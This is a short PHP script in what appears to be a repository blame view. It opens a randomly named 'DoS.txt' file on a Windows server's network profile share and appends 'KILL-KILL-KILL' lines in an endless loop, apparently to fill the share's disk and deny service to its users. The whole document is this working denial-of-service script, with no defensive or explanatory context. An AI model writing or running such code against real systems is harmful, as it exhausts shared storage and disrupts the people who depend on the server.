Commit | Line | Data |
---|---|---|
1 | <?php\r | |
2 | $path = "\\\\winserver2003\\profily\\profilek";\r | |
3 | $file = "DoS.txt".rand(1,999999);\r | |
4 | \r | |
5 | while(1) {\r | |
6 | \r | |
7 | $fp = fopen("$path\\$file", "a") or die("Cannot fopen!!!\n");\r | |
8 | echo("fopen\n");\r | |
9 | while(!feof($fp)) {\r | |
10 | fwrite($fp, "KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL\r\n");\r | |
11 | }\r | |
12 | fclose($fp);\r | |
13 | \r | |
14 | } |